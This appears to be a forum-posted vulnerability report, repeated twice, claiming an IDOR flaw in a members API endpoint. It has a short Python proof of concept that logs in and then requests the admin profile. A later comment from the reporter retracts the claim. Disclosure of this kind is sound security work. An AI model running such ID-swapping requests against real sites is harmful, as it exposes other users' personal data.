## Summary
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests
url = "http://localhost:8000/api/v1/token"
credentials = {
"username": "test", # username
"password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
token_data = res.json()
access_token = token_data.get("access_token")
refresh_token = token_data.get("refresh_token")
print("[+] Access Token:", access_token)
print("[+] Refresh Token:", refresh_token)
else:
print(f"[!] 로그인 실패: {res.status_code}")
print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
"Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests
url = "http://localhost:8000/api/v1/token"
credentials = {
"username": "test", # username
"password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
token_data = res.json()
access_token = token_data.get("access_token")
refresh_token = token_data.get("refresh_token")
print("[+] Access Token:", access_token)
print("[+] Refresh Token:", refresh_token)
else:
print(f"[!] 로그인 실패: {res.status_code}")
print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
"Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
댓글 1개
oxqnd
3개월 전
I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.
I apologize for the confusion, and I will close this issue.
게시글 목록
| 번호 | 제목 |
|---|---|
| 329 | |
| 326 | |
| 325 | |
| 324 | |
| 323 | |
| 319 | |
| 318 | |
| 314 | |
| 313 | |
| 310 | |
| 309 | |
| 307 | |
| 306 | |
| 305 | |
| 304 | |
| 303 | |
| 302 | |
| 301 | |
| 300 | |
| 299 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기